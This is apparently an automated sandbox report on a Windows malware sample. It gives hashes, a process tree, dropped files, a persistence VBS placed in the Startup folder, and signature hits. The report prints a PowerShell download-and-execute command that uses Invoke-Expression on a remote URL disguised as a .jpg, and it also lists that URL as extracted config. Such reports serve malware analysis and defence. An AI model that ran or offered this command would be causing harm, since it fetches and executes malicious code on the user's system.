Analysis
-
max time kernel
90s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
17-05-2022 13:06
Static task
static1
Behavioral task
behavioral1
Sample
2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
Resource
win10v2004-20220414-en
General
-
Target
2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
-
Size
6.1MB
-
MD5
5f9e61796a21e65f9a03f92ee6a8f6d8
-
SHA1
d6032fd04db0fbb6195b6e8d31491a3fc289f1ce
-
SHA256
2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba
-
SHA512
402ed4a2a376621e2674f1539c9ec6ac85b9118cb2133054ea2d960e98bf06efdd12b50f135841872450d3e07c231d2b6d8cab91315f05771226ec2546596eeb
Malware Config
Extracted
http://supportnimbuzz.hexat.com/3/Att.jpg
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1164 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
WinUpdat.exeWinUpdat.exepid process 1860 WinUpdat.exe 2024 WinUpdat.exe -
Drops startup file 1 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinUpdat.vbs WScript.exe -
Loads dropped DLL 13 IoCs
Processes:
2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exeWinUpdat.exeWinUpdat.exepid process 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe 984 1860 WinUpdat.exe 2024 WinUpdat.exe 2024 WinUpdat.exe 2024 WinUpdat.exe 2024 WinUpdat.exe 2024 WinUpdat.exe 2024 WinUpdat.exe 2024 WinUpdat.exe 2024 WinUpdat.exe 2024 WinUpdat.exe -
Detects Pyinstaller 7 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\WinUpdat.exe pyinstaller \Users\Admin\AppData\Local\Temp\WinUpdat.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe pyinstaller \Users\Admin\AppData\Local\Temp\WinUpdat.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe pyinstaller \Users\Admin\AppData\Local\Temp\WinUpdat.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1164 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1164 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exeWinUpdat.exeWinUpdat.exeWScript.exedescription pid process target process PID 1012 wrote to memory of 1860 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe WinUpdat.exe PID 1012 wrote to memory of 1860 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe WinUpdat.exe PID 1012 wrote to memory of 1860 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe WinUpdat.exe PID 1012 wrote to memory of 1860 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe WinUpdat.exe PID 1860 wrote to memory of 2024 1860 WinUpdat.exe WinUpdat.exe PID 1860 wrote to memory of 2024 1860 WinUpdat.exe WinUpdat.exe PID 1860 wrote to memory of 2024 1860 WinUpdat.exe WinUpdat.exe PID 1012 wrote to memory of 2004 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe WScript.exe PID 1012 wrote to memory of 2004 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe WScript.exe PID 1012 wrote to memory of 2004 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe WScript.exe PID 1012 wrote to memory of 2004 1012 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe WScript.exe PID 2024 wrote to memory of 1812 2024 WinUpdat.exe cmd.exe PID 2024 wrote to memory of 1812 2024 WinUpdat.exe cmd.exe PID 2024 wrote to memory of 1812 2024 WinUpdat.exe cmd.exe PID 2004 wrote to memory of 1164 2004 WScript.exe powershell.exe PID 2004 wrote to memory of 1164 2004 WScript.exe powershell.exe PID 2004 wrote to memory of 1164 2004 WScript.exe powershell.exe PID 2004 wrote to memory of 1164 2004 WScript.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe"C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeC:\Users\Admin\AppData\Local\Temp\WinUpdat.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeC:\Users\Admin\AppData\Local\Temp\WinUpdat.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c title SMTP CRACKER V3 By ARON-TN4⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbs"2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://supportnimbuzz.hexat.com/3/Att.jpg')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbsFilesize
545B
MD5bf83a0622f50dfe26baed65b8fb73a93
SHA14dce1e24f1a465b427d3a8afce0c9719ef7b7a73
SHA256ded94f48e84bf9d99d42fe67fd75ea6971a66b225a429e2c12295e7513ecf894
SHA5122141e65f84486bc512e36dd5ad54371f286cdb7eb5e91f0e69c7910de4fbd932755e3f422feee54a3d2d3c074433ff9cb1bc4eef6842b5d9b9451bc21c75ff0e
-
C:\Users\Admin\AppData\Local\Temp\_MEI18602\MSVCR90.dllFilesize
627KB
MD5ab2156d75b2c9589f925fc2ab83607e6
SHA183990c32b1006e0558de27e55b3862f5ea554394
SHA256bc832bfbc5fa36b6e712c9d3de99d5ebe57ec94fe2838ca2f81db42eed49efcc
SHA5122ca212b1430bdd1824aa139185ceb33f2ed7d622de6d470870b256cad75f859fff13cde3547b717deca650652cbc8b0fe337c4e4c14ba3c21a360dda24706086
-
C:\Users\Admin\AppData\Local\Temp\_MEI18602\python27.dllFilesize
3.3MB
MD53e35352c82fbccda9c372b8443f73e5e
SHA1a30a055e2e7b12c0a6d56afc1869b3b5283ac889
SHA256dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07
SHA512ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae
-
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_ctypes.pydFilesize
119KB
MD5f5ec0b24dfc7952241c7a86abfb61455
SHA184176ec5d9f6d106a3ac1724539dfccb7c4c6c33
SHA2566c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191
SHA51291fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040
-
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_hashlib.pydFilesize
1.6MB
MD5c94e5379dc430bc98b676260a929c1c6
SHA111305c38d58b104a2bd834925bf44930a41a416c
SHA25611e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d
SHA512d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20
-
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_multiprocessing.pydFilesize
34KB
MD5243a85355713e19c26c5f3f27e9876fd
SHA1059006569bd693285ec0373724d49b23d592b2eb
SHA25632e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6
SHA512ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962
-
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_socket.pydFilesize
50KB
MD5542726bb334376b4ee0b20cb19853cbb
SHA166f88bffce320371e208b5993313b1d84e234dbf
SHA256ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279
SHA5123bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613
-
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_ssl.pydFilesize
2.0MB
MD51b4639e2970bc4a12e0715f161c26e15
SHA169c9f8152410380ae4e2465d1711c6d577f7da96
SHA256260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774
SHA5122f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991
-
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\select.pydFilesize
11KB
MD55659b1b9b316b0dd48556293fd2062f2
SHA10cb51157ad3655060bc3425174e6feabd8fee07a
SHA2568affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512
SHA512f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9
-
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\unicodedata.pydFilesize
676KB
MD5252a1e38d86c07ac3a476db9117e3453
SHA1b708dc6b672f85f57e7da7a99ef5682616cca2bf
SHA2568473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93
SHA512aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a
-
\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
\Users\Admin\AppData\Local\Temp\_MEI18602\msvcr90.dllFilesize
627KB
MD5ab2156d75b2c9589f925fc2ab83607e6
SHA183990c32b1006e0558de27e55b3862f5ea554394
SHA256bc832bfbc5fa36b6e712c9d3de99d5ebe57ec94fe2838ca2f81db42eed49efcc
SHA5122ca212b1430bdd1824aa139185ceb33f2ed7d622de6d470870b256cad75f859fff13cde3547b717deca650652cbc8b0fe337c4e4c14ba3c21a360dda24706086
-
\Users\Admin\AppData\Local\Temp\_MEI18602\python27.dllFilesize
3.3MB
MD53e35352c82fbccda9c372b8443f73e5e
SHA1a30a055e2e7b12c0a6d56afc1869b3b5283ac889
SHA256dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07
SHA512ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae
-
\Users\Admin\AppData\Local\Temp\_MEI18~1\_ctypes.pydFilesize
119KB
MD5f5ec0b24dfc7952241c7a86abfb61455
SHA184176ec5d9f6d106a3ac1724539dfccb7c4c6c33
SHA2566c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191
SHA51291fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040
-
\Users\Admin\AppData\Local\Temp\_MEI18~1\_hashlib.pydFilesize
1.6MB
MD5c94e5379dc430bc98b676260a929c1c6
SHA111305c38d58b104a2bd834925bf44930a41a416c
SHA25611e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d
SHA512d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20
-
\Users\Admin\AppData\Local\Temp\_MEI18~1\_multiprocessing.pydFilesize
34KB
MD5243a85355713e19c26c5f3f27e9876fd
SHA1059006569bd693285ec0373724d49b23d592b2eb
SHA25632e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6
SHA512ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962
-
\Users\Admin\AppData\Local\Temp\_MEI18~1\_socket.pydFilesize
50KB
MD5542726bb334376b4ee0b20cb19853cbb
SHA166f88bffce320371e208b5993313b1d84e234dbf
SHA256ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279
SHA5123bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613
-
\Users\Admin\AppData\Local\Temp\_MEI18~1\_ssl.pydFilesize
2.0MB
MD51b4639e2970bc4a12e0715f161c26e15
SHA169c9f8152410380ae4e2465d1711c6d577f7da96
SHA256260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774
SHA5122f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991
-
\Users\Admin\AppData\Local\Temp\_MEI18~1\select.pydFilesize
11KB
MD55659b1b9b316b0dd48556293fd2062f2
SHA10cb51157ad3655060bc3425174e6feabd8fee07a
SHA2568affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512
SHA512f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9
-
\Users\Admin\AppData\Local\Temp\_MEI18~1\unicodedata.pydFilesize
676KB
MD5252a1e38d86c07ac3a476db9117e3453
SHA1b708dc6b672f85f57e7da7a99ef5682616cca2bf
SHA2568473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93
SHA512aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a
-
memory/1012-54-0x0000000076851000-0x0000000076853000-memory.dmpFilesize
8KB
-
memory/1164-82-0x0000000000000000-mapping.dmp
-
memory/1164-84-0x0000000073D40000-0x00000000742EB000-memory.dmpFilesize
5.7MB
-
memory/1812-80-0x0000000000000000-mapping.dmp
-
memory/1860-57-0x0000000000000000-mapping.dmp
-
memory/2004-65-0x0000000000000000-mapping.dmp
-
memory/2024-62-0x0000000000000000-mapping.dmp